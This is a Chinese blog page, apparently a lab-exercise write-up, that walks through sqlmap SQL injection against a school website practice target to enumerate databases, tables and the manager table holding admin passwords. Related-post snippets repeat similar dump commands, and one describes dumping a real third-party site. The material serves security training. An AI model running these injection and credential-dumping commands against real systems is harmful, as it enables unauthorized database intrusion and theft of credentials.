sqlmap实战,攻击学校学院网站(靶机)

最新推荐文章于 2024-09-14 14:38:47 发布
最新推荐文章于 2024-09-14 14:38:47 发布
阅读量1.8k 收藏 26
点赞数 4
文章标签: sql 数据库 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Marsper/article/details/108524566
版权
本文详细介绍了使用sqlmap工具攻击学院网站靶机,通过寻找注入点,利用sqlmap获取管理员密码的过程。经过一步步操作,确定数据库、表及字段,最终揭示了经过base64和MD5双重加密的密码。
摘要由CSDN通过智能技术生成

sqlmap实战,获取学院网站(靶机)管理员密码

首先获取学院网址,寻找注入点,利用上节学到的sqlmap使用方法
然后直接放进sqlmap里运行,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027
如下图

在这里插入图片描述
接着找出所有数据库,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 --dbs
运行结果如下
在这里插入图片描述
接着选择rjxy数据库,找出所有的表,输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid=3027 -D rjxy --tables
运行结果如下
在这里插入图片描述
要寻找管理员密码,所以选择manager表,找出里面所有字段
输入sqlmap.py -u http://117.167.136.244:28004/index/narticle.php?nid&

最低0.47元/天 解锁文章
曦枳icon.
关注
sqlmap注入工具----一次简单的注入(实战
weixin_33675507的博客
08-20 735
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
sqlmap实战
中国好利鹏
10-31 1721
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php? id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下, http://www.slibrary.com/link.php?id=321‘ http://www.slibrary.com/link.php?id=321 and 1=1 ht
SQL注入之sqlmap实战
最新发布
bigbangbangbang1的博客
09-14 1118
sqlmap 是一款自动化的 SQL 注入工具,它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统,包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测:能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式:支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举:可以枚举数据库的名称、表名、列名和数据。权限提升:尝试提升数据库用户的权限,以获取更高的访问权限。
SQLmap实战
unsurpassed的博客
03-13 732
1、实战mssql 判断注入类型 python sqlmap.py -u 注入点 判断当前用户是否是dba python sqlmap.py -u 注入点 --is-dba -v 1 列举数据库用户 python sqlmap.py -u 注入点 --users -v 0 列举数据库密码 python sqlmap.py -u 注入点 --passwords -v 0 查看用户权限 ...
使用SQLMAP网站数据库进行SQL注入攻击
zhangjie15397的专栏
09-18 9774
from:http://www.blackmoreops.com/2014/05/07/use-sqlmap-sql-injection-hack-website-database/ 0x00 背景介绍 1. 什么是SQL注入? SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序
SQL 注入之 sqlmap 实战
2301_77160226的博客
08-29 1534
sqlmap 是一款自动化的 SQL 注入工具,它可以检测、利用和接管数据库服务器。它支持多种数据库管理系统,包括 MySQL、Oracle、PostgreSQL、Microsoft SQL Server 等。自动化检测:能够自动检测目标网站是否存在 SQL 注入漏洞。多种攻击方式:支持基于错误、布尔盲注、时间盲注等多种 SQL 注入攻击方式。数据库枚举:可以枚举数据库的名称、表名、列名和数据。权限提升:尝试提升数据库用户的权限,以获取更高的访问权限。
Sqlmap实战
春天不是读书人的博客
08-25 391
以知识盒子为案例,记录基本用法 检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tabl
sqlmap实战(学校靶机
weixin_50401030的博客
09-10 278
进入靶机 打开sqlmap 先找注入点,然后再将网站丢到sqlmap里面测试能不能注入 sqlmap.py -u "http://.../narticle.php?nid=3050" 这里显然是可以注入的,然后再找数据库 sqlmap.py -u "http://.../narticle.php?nid=3050" --dbs 找到数据库看到因为是软件学院所以显然是从rjxy下手找表 sqlmap.py -u "http://.../narticle.ph..
sqlmap实战攻击靶机
weixin_50644630的博客
09-12 969
sqlmap实战(攻击学校靶机) 进入学校靶机 找到注入点,并放入sqlmap中测试是否可以注入 查看数据库 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" --dbs 查询数据库 “rjxy” 的数据表 sqlmap -u "http://117.167.136.244:28011/index/narticle.php?nid=3050" -D rjxy --tables 查询manager数据表的字段
SQLMap实战——RDCTF靶机训练
qq_50647304的博客
09-12 322
用rdctf的题目练习 开启环境进入靶机 找到注入点,用sqlmap测试能否注入: 跑完以后发现能注入,输入python sqlmap.py -u “url” --dbs 查询数据库: 选择数据库rjxy,输入python sqlmap.py -u “url” -D rjxy --tables 查询数据表: 选择manager表,输入 ...
SQLMAP使用实战测试
06-12
对于SQLmap的使用教程,挺实用的,详细可能差不多
sqlmap靶机实战注入
weixin_50644728的博客
09-12 529
1.进入rdctf平台部署网站 将获得的网址放入浏览器搜索框中,进入网站之后随意点进一个页面。 2.检测url是否存在sql注入的风险 window键+R调出命令运行框,切换目录到sqlmap的绝对路径后,输入以下命令,利用sqlmap判断此url是否有sql注入的风险。 python sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3100” 下图表明当前的url中的nid存在SQL注入 3.在输入下面命令获取数据库
sqlmap实战靶机
sweetie 的博客
09-10 1195
sqlmap攻击学校靶机 进入学校网页主页 随机点击 使用命令>python2 sqlmap.py -u “http://117.167.136.244:28004/index/narticle.php?nid=3094” --dump -D rjxy -T manager -C “password,username” 遇到选择 do you want to crack them via a dictionary-based attack? [Y/n/q] Y do you want to use
sqlmap的应用实战
vala0901的博客
05-10 7254
小白一枚,在大神的各种帖子帮助下刚学会用sqlmap,写下过程一起分享
sqlmap靶机实战
qq_46485934的博客
09-10 422
一.寻找目标网站的注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
【网络安全】sqlmap实战
你在看屏幕的同时,屏幕也在注视着你
04-09 1437
sqlmap实战一、sqlmap配置(1)python27安装(2)sqlmap安装(3)配置环境变量(4)验证是否配置完成二、sqlmap语法(1)常用语法及其说明(2)sqlmap的使用说明三、sqlmap实战实战操作四、总结 一、sqlmap配置 (1)python27安装 python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:\python\python2.7) (2)sqlmap安装 1.sqlmap的 下
转载:sqlmap的应用实战
sinolzeng的专栏
02-13 383
原文链接:https://blog.csdn.net/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。 1.首先要知道可以注入的网址是什么 http://www.bible-history.com/subcat.php?id=..
SQLMap实战:常用命令详解
"这篇文档提供了一些sqlmap工具的常用命令示例,用于SQL注入攻击,包括获取当前用户、数据库、表名、列名以及数据的提取。此外,还提到了智能检测级别和指定DBMS类型来查找用户的方法。" sqlmap是一款强大的自动化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值